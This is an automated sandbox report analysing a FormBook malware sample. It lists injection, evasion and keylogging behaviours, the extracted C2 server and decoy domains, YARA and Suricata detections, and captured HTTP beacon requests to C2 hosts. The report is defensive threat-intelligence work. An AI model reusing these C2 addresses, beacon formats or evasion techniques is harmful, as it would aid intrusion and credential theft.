Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8t1uarSZFV.exe

Overview

General Information

Sample name:8t1uarSZFV.exe
renamed because original name is a hash value
Original sample name:b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5.exe
Analysis ID:1489361
MD5:14876f2aecbf08493108d81f260bfe7a
SHA1:ef0dfe01cecc9972141738f251a235059082b106
SHA256:b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8t1uarSZFV.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\8t1uarSZFV.exe" MD5: 14876F2AECBF08493108D81F260BFE7A)
    • svchost.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\8t1uarSZFV.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 7396 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 7428 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ParentImage: C:\Users\user\Desktop\8t1uarSZFV.exe, ParentProcessId: 7292, ParentProcessName: 8t1uarSZFV.exe, ProcessCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ProcessId: 7312, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ParentImage: C:\Users\user\Desktop\8t1uarSZFV.exe, ParentProcessId: 7292, ParentProcessName: 8t1uarSZFV.exe, ProcessCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ProcessId: 7312, ProcessName: svchost.exe

          Suricata Signatures

          Timestamp:2024-08-07T12:47:40.875845+0200
          SID:2031453
          Severity:1
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-07T12:49:42.895880+0200
          SID:2031453
          Severity:1
          Source Port:49740
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-07T12:51:05.923753+0200
          SID:2031453
          Severity:1
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-07T12:46:56.400874+0200
          SID:2031453
          Severity:1
          Source Port:49739
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-07T12:48:01.173402+0200
          SID:2031453
          Severity:1
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}
          Multi AV Scanner detection for domain / URL
          Source: kevintomc.github.ioVirustotal: Detection: 9%Perma Link
          Multi AV Scanner detection for submitted file
          Source: 8t1uarSZFV.exeReversingLabs: Detection: 55%
          Source: 8t1uarSZFV.exeVirustotal: Detection: 47%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: 8t1uarSZFV.exeJoe Sandbox ML: detected
          Source: 8t1uarSZFV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100DBBE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0101698F
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010168EE FindFirstFileW,FindClose,0_2_010168EE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0100D076
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0100D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0100D3A9
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101979D
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01019642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01019642
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01019B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_01019B2B
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01015C97 FindFirstFileW,FindNextFileW,FindClose,0_2_01015C97

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 65.21.196.90 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.145 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.crucka.xyz/jd21/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.00050591.xyz
          Source: DNS query: www.crucka.xyz
          Source: global trafficHTTP traffic detected: GET /jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp HTTP/1.1Host: www.californiacurrentelectric.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.145 66.235.200.145
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,0_2_0101CF1A
          Source: global trafficHTTP traffic detected: GET /jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp HTTP/1.1Host: www.00050591.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp HTTP/1.1Host: www.californiacurrentelectric.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.00050591.xyz
          Source: global trafficDNS traffic detected: DNS query: www.californiacurrentelectric.com
          Source: global trafficDNS traffic detected: DNS query: www.b2vvuc00.sbs
          Source: global trafficDNS traffic detected: DNS query: www.susansellsmarin.com
          Source: global trafficDNS traffic detected: DNS query: www.urbanholidayz.com
          Source: global trafficDNS traffic detected: DNS query: www.batremake.com
          Source: global trafficDNS traffic detected: DNS query: www.crucka.xyz
          Source: global trafficDNS traffic detected: DNS query: www.tech-with-thulitha.site
          Source: global trafficDNS traffic detected: DNS query: www.fostertv.net
          Source: global trafficDNS traffic detected: DNS query: www.p-afactorysale.shop
          Source: global trafficDNS traffic detected: DNS query: www.arthemis-168bet.site
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000002.00000000.1713192297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4153445383.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4149679384.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
